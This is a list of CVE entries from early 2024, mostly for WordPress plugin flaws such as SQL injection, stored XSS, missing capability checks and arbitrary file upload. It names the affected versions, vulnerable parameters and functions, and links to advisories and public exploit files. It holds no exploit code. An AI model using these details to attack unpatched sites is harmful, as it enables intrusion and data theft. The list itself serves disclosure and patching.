CVE    2024    1208    Candidate    The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.    MISC:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210   |   URL:https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210   |   MISC:https://www.learndash.com/release-notes/   |   URL:https://www.learndash.com/release-notes/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve    Assigned (20240202)
CVE    2024    1207    Candidate    The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve    Assigned (20240202)
CVE    2024    1206    Candidate    The WP Recipe Maker plugin for WordPress is vulnerable to SQL Injection via the 'recipes' parameter in all versions up to, and including, 9.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/class-wprm-import-manager.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/class-wprm-import-manager.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-mealplannerpro.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-mealplannerpro.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-recipecard.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-recipecard.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoom.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoom.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoomcpt.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-wpzoomcpt.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-yummly.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032702/wp-recipe-maker/trunk/includes/admin/import/class-wprm-import-yummly.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b10d8f8a-517f-4286-b501-0ca040529362?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b10d8f8a-517f-4286-b501-0ca040529362?source=cve    Assigned (20240202)
CVE    2024    1205    Candidate    The Management App for WooCommerce – Order notifications, Order management, Lead management, Uptime Monitoring plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the nouvello_upload_csv_file function in all versions up to, and including, 1.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.    MISC:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982   |   URL:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982   |   MISC:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166   |   URL:https://plugins.trac.wordpress.org/browser/wemanage-app-worker/trunk/includes/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve    Assigned (20240202)
CVE    2024    1203    Candidate    The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'valueData' parameter in all versions up to, and including, 6.9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1850   |   URL:https://plugins.trac.wordpress.org/browser/enhanced-e-commerce-for-woocommerce-store/trunk/includes/data/class-tvc-ajax-file.php#L1850   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7eb7d499-28ba-48ef-9798-b7c8cbb7aa3e?source=cve    Assigned (20240202)
CVE    2024    1202    Candidate    Authentication Bypass by Primary Weakness vulnerability in XPodas Octopod allows Authentication Bypass. This issue affects Octopod: before v1. NOTE: The vendor was contacted and it was learned that the product is not supported.    MISC:https://www.usom.gov.tr/bildirim/tr-24-0174   |   URL:https://www.usom.gov.tr/bildirim/tr-24-0174    Assigned (20240202)
CVE    2024    1201    Candidate    Search path or unquoted item vulnerability in HDD Health affecting versions 4.2.0.112 and earlier. This vulnerability could allow a local attacker to store a malicious executable file within the unquoted search path, resulting in privilege escalation.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/panterasoft-hdd-health-search-path-or-unquoted-item-vulnerability   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/panterasoft-hdd-health-search-path-or-unquoted-item-vulnerability    Assigned (20240202)
CVE    2024    1200    Candidate    A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /template/1/default/. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252698 is the identifier assigned to this vulnerability.    MISC:https://github.com/sweatxi/BugHub/blob/main/Nanchang%20Lanzhi%20Technology%20Co.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/Nanchang%20Lanzhi%20Technology%20Co.pdf   |   MISC:https://vuldb.com/?ctiid.252698   |   URL:https://vuldb.com/?ctiid.252698   |   MISC:https://vuldb.com/?id.252698   |   URL:https://vuldb.com/?id.252698    Assigned (20240202)
CVE    2024    1199    Candidate    A vulnerability has been found in CodeAstro Employee Task Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file \employee-tasks-php\attendance-info.php. The manipulation of the argument aten_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252697 was assigned to this vulnerability.    MISC:https://docs.qq.com/doc/DYnhIWEdkZXViTXdD   |   URL:https://docs.qq.com/doc/DYnhIWEdkZXViTXdD   |   MISC:https://vuldb.com/?ctiid.252697   |   URL:https://vuldb.com/?ctiid.252697   |   MISC:https://vuldb.com/?id.252697   |   URL:https://vuldb.com/?id.252697    Assigned (20240202)
CVE    2024    1198    Candidate    A vulnerability, which was classified as critical, was found in openBI up to 6.0.3. Affected is the function addxinzhi of the file application/controllers/User.php of the component Phar Handler. The manipulation of the argument outimgurl leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252696.    MISC:https://note.zhaoj.in/share/qFXZZfp1NLa3   |   URL:https://note.zhaoj.in/share/qFXZZfp1NLa3   |   MISC:https://vuldb.com/?ctiid.252696   |   URL:https://vuldb.com/?ctiid.252696   |   MISC:https://vuldb.com/?id.252696   |   URL:https://vuldb.com/?id.252696    Assigned (20240202)
CVE    2024    1197    Candidate    A vulnerability, which was classified as critical, has been found in SourceCodester Testimonial Page Manager 1.0. This issue affects some unknown processing of the file delete-testimonial.php of the component HTTP GET Request Handler. The manipulation of the argument testimony leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-252695.    MISC:https://vuldb.com/?ctiid.252695   |   URL:https://vuldb.com/?ctiid.252695   |   MISC:https://vuldb.com/?id.252695   |   URL:https://vuldb.com/?id.252695    Assigned (20240202)
CVE    2024    1196    Candidate    A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252694   |   URL:https://vuldb.com/?ctiid.252694   |   MISC:https://vuldb.com/?id.252694   |   URL:https://vuldb.com/?id.252694    Assigned (20240202)
CVE    2024    1195    Candidate    A vulnerability classified as critical was found in iTop VPN up to 4.0.0.1. Affected by this vulnerability is an unknown functionality in the library ITopVpnCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The identifier VDB-252685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.252685   |   URL:https://vuldb.com/?ctiid.252685   |   MISC:https://vuldb.com/?id.252685   |   URL:https://vuldb.com/?id.252685   |   MISC:https://www.youtube.com/watch?v=JdQMINPVJd8   |   URL:https://www.youtube.com/watch?v=JdQMINPVJd8    Assigned (20240202)
CVE    2024    1194    Candidate    A vulnerability classified as problematic has been found in Armcode AlienIP 2.41. Affected is an unknown function of the component Locate Host Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/25-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/25-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252684   |   URL:https://vuldb.com/?ctiid.252684   |   MISC:https://vuldb.com/?id.252684   |   URL:https://vuldb.com/?id.252684    Assigned (20240202)
CVE    2024    1193    Candidate    A vulnerability was found in Navicat 12.0.29. It has been rated as problematic. This issue affects some unknown processing of the component MySQL Connection Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252683. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/24-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/24-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252683   |   URL:https://vuldb.com/?ctiid.252683   |   MISC:https://vuldb.com/?id.252683   |   URL:https://vuldb.com/?id.252683    Assigned (20240202)
CVE    2024    1192    Candidate    A vulnerability was found in South River WebDrive 18.00.5057. It has been declared as problematic. This vulnerability affects unknown code of the component New Secure WebDAV. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-252682 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/22-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/22-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252682   |   URL:https://vuldb.com/?ctiid.252682   |   MISC:https://vuldb.com/?id.252682   |   URL:https://vuldb.com/?id.252682    Assigned (20240202)
CVE    2024    1191    Candidate    A vulnerability was found in Hyper CdCatalog 2.3.1. It has been classified as problematic. This affects an unknown part of the component HCF File Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-252681 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/19-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/19-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252681   |   URL:https://vuldb.com/?ctiid.252681   |   MISC:https://vuldb.com/?id.252681   |   URL:https://vuldb.com/?id.252681    Assigned (20240202)
CVE    2024    1190    Candidate    A vulnerability was found in Global Scape CuteFTP 9.3.0.3 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument Host/Username/Password leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252680. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/16-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/16-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252680   |   URL:https://vuldb.com/?ctiid.252680   |   MISC:https://vuldb.com/?id.252680   |   URL:https://vuldb.com/?id.252680    Assigned (20240202)
CVE    2024    1189    Candidate    A vulnerability has been found in AMPPS 2.7 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Encryption Passphrase Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252679. NOTE: The vendor explains that AMPPS 4.0 is a complete overhaul and the code was re-written.    MISC:https://fitoxs.com/vuldb/15-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/15-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252679   |   URL:https://vuldb.com/?ctiid.252679   |   MISC:https://vuldb.com/?id.252679   |   URL:https://vuldb.com/?id.252679    Assigned (20240202)
CVE    2024    1188    Candidate    A vulnerability, which was classified as problematic, was found in Rizone Soft Notepad3 1.0.2.350. Affected is an unknown function of the component Encryption Passphrase Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-252678 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/14-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/14-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252678   |   URL:https://vuldb.com/?ctiid.252678   |   MISC:https://vuldb.com/?id.252678   |   URL:https://vuldb.com/?id.252678    Assigned (20240202)
CVE    2024    1187    Candidate    A vulnerability, which was classified as problematic, has been found in Munsoft Easy Outlook Express Recovery 2.0. This issue affects some unknown processing of the component Registration Key Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252677 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/13-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/13-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252677   |   URL:https://vuldb.com/?ctiid.252677   |   MISC:https://vuldb.com/?id.252677   |   URL:https://vuldb.com/?id.252677    Assigned (20240202)
CVE    2024    1186    Candidate    A vulnerability classified as problematic was found in Munsoft Easy Archive Recovery 2.0. This vulnerability affects unknown code of the component Registration Key Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252676. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/12-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/12-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252676   |   URL:https://vuldb.com/?ctiid.252676   |   MISC:https://vuldb.com/?id.252676   |   URL:https://vuldb.com/?id.252676   |   MISC:https://www.exploit-db.com/exploits/45884   |   URL:https://www.exploit-db.com/exploits/45884    Assigned (20240202)
CVE    2024    1185    Candidate    A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/11-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/11-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252675   |   URL:https://vuldb.com/?ctiid.252675   |   MISC:https://vuldb.com/?id.252675   |   URL:https://vuldb.com/?id.252675    Assigned (20240202)
CVE    2024    1184    Candidate    A vulnerability was found in Nsasoft Network Sleuth 3.0.0.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-252674 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://fitoxs.com/vuldb/10-exploit-perl.txt   |   URL:https://fitoxs.com/vuldb/10-exploit-perl.txt   |   MISC:https://vuldb.com/?ctiid.252674   |   URL:https://vuldb.com/?ctiid.252674   |   MISC:https://vuldb.com/?id.252674   |   URL:https://vuldb.com/?id.252674    Assigned (20240202)
CVE    2024    1181    Candidate    The Coming Soon, Under Construction & Maintenance Mode By Dazzler plugin for WordPress is vulnerable to maintenance mode bypass in all versions up to, and including, 2.1.2. This is due to the plugin relying on the REQUEST_URI to determine if the page being accessed is an admin area. This makes it possible for unauthenticated attackers to bypass maintenance mode and access the site which may be considered confidential when in maintenance mode.    MISC:https://plugins.trac.wordpress.org/browser/coming-soon-wp/trunk/coming-soon-wp.php#L45   |   URL:https://plugins.trac.wordpress.org/browser/coming-soon-wp/trunk/coming-soon-wp.php#L45   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6dc144cd-7119-477f-9fa1-b00cab215077?source=cve    Assigned (20240201)
CVE    2024    1178    Candidate    The SportsPress – Sports Club & League Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.7.17. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043889%40sportspress&new=3043889%40sportspress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/098dfee2-ba0b-420f-89ed-8ad1e41faec4?source=cve    Assigned (20240201)
CVE    2024    1177    Candidate    The WP Club Manager – WordPress Sports Club Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the settings_save() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to update the permalink structure for the clubs    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030843%40wp-club-manager&new=3030843%40wp-club-manager&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/64c2c8c2-58f5-4b7d-b226-39ba39e887d5?source=cve    Assigned (20240201)
CVE    2024    1176    Candidate    The HT Easy GA4 – Google Analytics WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the login() function in all versions up to, and including, 1.1.5. This makes it possible for unauthenticated attackers to update the email associated through the plugin with GA4.    MISC:https://plugins.trac.wordpress.org/browser/ht-easy-google-analytics/trunk/includes/class.ht-easy-ga4.php#L99   |   URL:https://plugins.trac.wordpress.org/browser/ht-easy-google-analytics/trunk/includes/class.ht-easy-ga4.php#L99   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/10e1b3ac-f002-4108-9682-5fe300f07adb?source=cve    Assigned (20240201)
CVE    2024    1174    Candidate    Previous versions of HP ThinPro (prior to HP ThinPro 8.0 SP 8) could potentially contain security vulnerabilities. HP has released HP ThinPro 8.0 SP 8, which includes updates to mitigate potential vulnerabilities.    MISC:https://support.hp.com/us-en/document/ish_10232639-10232671-16/hpsbhf03919   |   URL:https://support.hp.com/us-en/document/ish_10232639-10232671-16/hpsbhf03919    Assigned (20240201)
CVE    2024    1172    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1227   |   URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1227   |   MISC:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1292   |   URL:https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.7/includes/Elements/Adv_Accordion.php#L1292   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034127%40essential-addons-for-elementor-lite%2Ftrunk&old=3029928%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f2ff2cc6-b584-442b-890b-033a0a047c24?source=cve    Assigned (20240201)
CVE    2024    1171    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery Widget in all versions up to, and including, 5.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php   |   URL:https://plugins.trac.wordpress.org/changeset/3034127/essential-addons-for-elementor-lite/trunk/includes/Elements/Filterable_Gallery.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fafdd087-9637-41df-bc5a-97e1a02ea744?source=cve    Assigned (20240201)
CVE    2024    1170    Candidate    The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the handle_deleted_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to delete arbitrary media files.    MISC:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1493   |   URL:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1493   |   MISC:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7   |   URL:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk?contextall=1&old=3031945&old_path=%2Fbuddyforms%2Ftrunk#file7   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/380c646c-fd95-408a-89eb-3e646768bbc5?source=cve    Assigned (20240201)
CVE    2024    1169    Candidate    The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media upload due to a missing capability check on the buddyforms_upload_handle_dropped_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to upload media files.    MISC:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1466   |   URL:https://plugins.trac.wordpress.org/browser/buddyforms/trunk/includes/functions.php#L1466   |   MISC:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk/includes/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php   |   URL:https://plugins.trac.wordpress.org/changeset/3046092/buddyforms/trunk/includes/functions.php?contextall=1&old=3023795&old_path=%2Fbuddyforms%2Ftrunk%2Fincludes%2Ffunctions.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6d14a90d-65ea-45da-956b-0735e2e2b538?source=cve    Assigned (20240201)
CVE    2024    1167    Candidate    When SEW-EURODRIVE MOVITOOLS MotionStudio processes XML information, unrestricted file access can occur.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-016-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-016-01   |   MISC:https://www.seweurodrive.com/contact_us/contact_us.html   |   URL:https://www.seweurodrive.com/contact_us/contact_us.html    Assigned (20240201)
CVE    2024    1165    Candidate    The Brizy – Page Builder plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.4.39 via the 'id'. This makes it possible for authenticated attackers, with contributor-level access and above, to upload files to arbitrary locations on the server    MISC:https://plugins.trac.wordpress.org/browser/brizy/tags/2.4.39/editor/screenshot/manager.php#L33   |   URL:https://plugins.trac.wordpress.org/browser/brizy/tags/2.4.39/editor/screenshot/manager.php#L33   |   MISC:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/screenshot/manager.php   |   URL:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/screenshot/manager.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7673b2ba-5d7a-4ae9-92e7-1a910687fdb8?source=cve    Assigned (20240201)
CVE    2024    1163    Candidate    Uncontrolled Resource Consumption in GitHub repository mbloch/mapshaper prior to 0.6.44.    MISC:https://github.com/mbloch/mapshaper/commit/7437d903c0a87802c3751fc529d2de7098094c72   |   URL:https://github.com/mbloch/mapshaper/commit/7437d903c0a87802c3751fc529d2de7098094c72   |   MISC:https://huntr.com/bounties/c1cbc18b-e4ab-4332-ad13-0033f0f976f5   |   URL:https://huntr.com/bounties/c1cbc18b-e4ab-4332-ad13-0033f0f976f5    Assigned (20240201)
CVE    2024    1162    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.10.29. This is due to missing or incorrect nonce validation on the register_reference() function. This makes it possible for unauthenticated attackers to update the connected API keys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030173%40themeisle-companion&new=3030173%40themeisle-companion&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/88f6a24f-f14a-4d0a-be5a-f8c84910b4fc?source=cve    Assigned (20240201)
